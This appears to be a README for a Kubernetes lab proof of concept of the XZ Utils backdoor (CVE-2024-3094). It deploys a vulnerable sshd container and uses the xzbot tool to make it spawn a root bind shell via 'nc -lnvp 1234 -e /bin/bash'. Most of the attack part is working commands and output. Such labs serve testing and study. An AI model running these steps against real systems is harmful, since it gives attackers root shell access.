
XZ Utils CVE-2024-3094 POC for Kubernetes

This project is a Kubernetes-friendly Proof of Concept (POC) for CVE-2024-3094 affecting XZ Utils. See this article for an excellent walkthrough of the exploit's provenance and mechanics.



Running any of the commands below may result in the deployment of a vulnerable application that is highly susceptible to attack. If you choose to follow these steps, it is recommended that you do so in an airgapped test environment.



1: Roll out the vulnerable application

kubectl create -f xzwhy.yml

This will deploy a vulnerable SSH endpoint whose entrypoint is /bin/bash -c "env -i LANG=en_US.UTF-8 && unset TERM && unset LD_DEBUG && LD_LIBRARY_PATH=/CVE-2024-3094/ /usr/sbin/sshd -p 2222 -D"

2: Obtain the vulnerable endpoint's URL

The vulnerable SSH endpoint exposes two ports via a load balancer: 2222 is listening for SSH connections and 1234 is a convenience to allow ingress on a bind shell port that we will use during the exploit

  type: LoadBalancer
    - name: ssh
      protocol: TCP
      port: 2222
      targetPort: 2222
    - name: exploitshellingress
      protocol: TCP
      port: 1234
      targetPort: 1234

We can extract the deployed loadbalancer's URL using kubectl:

xzwhy_endpoint=`kubectl get services -o jsonpath='{.items[0].status.loadBalancer.ingress[0].hostname}' --namespace=xzwhy-ns --field-selector metadata.name=xzwhy-loadbalancer` && echo $xzwhy_endpoint

3: Initiate the attack by making a malicious SSH connection

Now we connect to the vulnerable server using the teamnautilus/xzbot utility:

docker run -it --rm golang:latest /bin/bash -c "mkdir -p /xzbot && pushd /xzbot/ && git clone https://github.com/amlweems/xzbot.git && ls -laF && pushd ./xzbot/ && go build -o /xzbot/tmp/; popd && /xzbot/tmp/xzbot -h && /xzbot/tmp/xzbot -addr $xzwhy_endpoint:2222 -cmd 'nc -lnvp 1234 -e /bin/bash'"

This will cause the vulnerable SSH server to execute a bind shell via nc -lnvp 1234 -e /bin/bash on our behalf. After running this command you should see something similar to:

Cloning into 'xzbot'...
remote: Enumerating objects: 30, done.
remote: Counting objects: 100% (30/30), done.
remote: Compressing objects: 100% (20/20), done.
remote: Total 30 (delta 14), reused 25 (delta 10), pack-reused 0
Receiving objects: 100% (30/30), 422.65 KiB | 8.99 MiB/s, done.
Resolving deltas: 100% (14/14), done.
total 12
drwxr-xr-x 3 root root 4096 Apr 17 22:37 ./
drwxr-xr-x 1 root root 4096 Apr 17 22:37 ../
drwxr-xr-x 4 root root 4096 Apr 17 22:37 xzbot/
/xzbot/xzbot /xzbot /go
go: downloading github.com/cloudflare/circl v1.3.7
go: downloading golang.org/x/crypto v0.21.0
go: downloading golang.org/x/sys v0.18.0
/xzbot /go
Usage of /xzbot/tmp/xzbot:
  -addr string
        ssh server address (default "")
  -cmd string
        command to run via system() (default "id > /tmp/.xz")
  -seed string
        ed448 seed, must match xz backdoor key (default "0")
4: Profit

Connect to the shell you spawned. Note the use of the xzwhy_endpoint variable:

nc $xzwhy_endpoint 1234

It isn't immediately obvious, but the command above connects to a bind shell as root. You can test this by running various commands:

hostname -i

5: Cleanup

kubectl delete -f xzwhy.yml
